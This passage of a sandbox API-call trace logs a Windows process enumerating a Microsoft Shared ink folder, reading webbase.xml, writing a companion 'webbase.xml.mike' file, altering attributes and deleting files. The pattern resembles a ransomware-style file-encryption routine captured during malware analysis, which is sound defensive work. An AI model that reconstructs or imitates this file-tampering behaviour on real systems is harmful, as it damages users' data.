ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.301] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x0, dwReserved1=0x0, cFileName="webbase.xml", cAlternateFileName="")) returned 1 [0046.302] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.302] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.305] GetFileType (hFile=0x264) returned 0x1 [0046.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.305] GetFileType (hFile=0x264) returned 0x1 [0046.305] CloseHandle (hObject=0x264) returned 1 [0046.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.305] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.305] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.306] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22e82bc | out: lpFileInformation=0x22e82bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e)) returned 1 [0046.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.306] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.306] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22e85fc | out: lpFileInformation=0x22e85fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e)) returned 1 [0046.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.306] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.306] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.306] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.307] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.308] GetFileType (hFile=0x264) returned 0x1 [0046.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.308] GetFileType (hFile=0x264) returned 0x1 [0046.308] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.308] WriteFile (in: hFile=0x264, lpBuffer=0x22e956c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22e956c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.309] CloseHandle (hObject=0x264) returned 1 [0046.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.309] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x22e903c | out: lpFileInformation=0x22e903c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e)) returned 1 [0046.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.309] GetFileType (hFile=0x264) returned 0x1 [0046.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.309] GetFileType (hFile=0x264) returned 0x1 [0046.309] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.309] ReadFile (in: hFile=0x264, lpBuffer=0x22ea6a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22ea6a8*, lpNumberOfBytesRead=0x2af038*=0x48e, lpOverlapped=0x0) returned 1 [0046.311] CloseHandle (hObject=0x264) returned 1 [0046.311] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.311] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.311] GetFileType (hFile=0x264) returned 0x1 [0046.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.311] GetFileType (hFile=0x264) returned 0x1 [0046.312] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.312] WriteFile (in: hFile=0x264, lpBuffer=0x22ef0ac*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22ef0ac*, lpNumberOfBytesWritten=0x2af02c*=0x490, lpOverlapped=0x0) returned 1 [0046.312] CloseHandle (hObject=0x264) returned 1 [0046.312] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.313] GetFileType (hFile=0x264) returned 0x1 [0046.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.313] GetFileType (hFile=0x264) returned 0x1 [0046.314] WriteFile (in: hFile=0x264, lpBuffer=0x22f22e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22f22e8*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.314] CloseHandle (hObject=0x264) returned 1 [0046.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.315] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5ce9100, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5ce9100, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ce9100, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0046.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.315] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22f3aec | out: lpFileInformation=0x22f3aec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5ce9100, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5ce9100, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ce9100, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0046.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.315] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", dwFileAttributes=0x80) returned 0 [0046.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.316] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5ce9100, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5ce9100, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ce9100, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0046.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpFilePart=0x0) returned 0x50 [0046.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike", lpFilePart=0x0) returned 0x55 [0046.317] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.mike")) returned 1 [0046.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.318] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpFilePart=0x0) returned 0x44 [0046.318] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\", lpFilePart=0x0) returned 0x45 [0046.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5ce9100, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ce9100, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5ce9100, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5ce9100, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x0, 